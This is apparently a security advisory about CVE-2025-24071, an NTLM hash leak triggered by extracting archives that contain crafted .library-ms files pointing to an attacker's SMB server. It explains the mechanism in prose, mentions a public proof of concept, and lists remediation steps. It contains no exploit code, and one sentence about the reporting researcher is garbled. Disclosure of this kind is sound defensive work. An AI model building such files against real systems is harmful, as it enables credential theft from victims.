Analysis Summary

A newly discovered security vulnerability, CVE-2025-24071, allows attackers to steal NTLM hashes when a user extracts specially crafted RAR or ZIP files. The flaw, reported by security researcher high-risk issue.

The vulnerability is caused by how Windows Explorer handles “.library-ms” files inside compressed archives. When a malicious .library-ms file containing an SMB path is extracted, Windows automatically processes the file to generate previews and index metadata. This happens without any user interaction, making the attack stealthy.

Attackers can craft a .library-ms file with a <simpleLocation> tag that points to an SMB server under their control. When the file is extracted, Windows attempts to connect to this server to gather metadata. This action triggers an automatic NTLM authentication handshake, sending the victim’s NTLMv2 hash to the attacker.

Security researchers used tools like Procmon and Wireshark to observe Windows Explorer and indexing services automatically performing file operations, including opening the malicious file and initiating SMB communication. The network captures clearly show NTLM authentication requests being sent to the attacker’s SMB server.

This vulnerability is actively being exploited in the wild and has reportedly been offered for sale on underground forums by a threat actor known as “Krypton,” who is also linked to the development of the “EncryptHub Stealer” malware.

A proof-of-concept (PoC) exploit for CVE-2025-24071 is available on GitHub, and a Metasploit module has also been developed. Microsoft has addressed this flaw in its latest Patch Tuesday update. Users are advised to apply the security patch immediately to protect their systems.

Impact

• Unauthorized Gain Access

Indicators of Compromise

CVE

• CVE-2025-24071

Remediation

• Refer to Microsoft Security Update Guide that addresses CVE-2025-24071.
• Block outbound SMB traffic (ports 445, 137-139) at the firewall to prevent NTLM hash leaks.
• Disable NTLM authentication where possible or enforce NTLMv2-only authentication policies.
• Use Group Policy to block the execution of .library-ms files from untrusted sources.
• Configure Windows Defender or endpoint security solutions to detect and block malicious .library-ms files.
• Avoid extracting unknown or untrusted RAR/ZIP archives, especially from email attachments or unverified sources.
• Monitor network traffic for unusual SMB authentication attempts, especially to external servers.
• Regularly review and audit NTLM authentication events in Windows Event Logs to detect potential abuse.
• Use tools like Procmon or Wireshark to analyze suspicious file extraction behavior and network activity.
• Educate employees about phishing tactics and the risks of extracting files from unknown sources.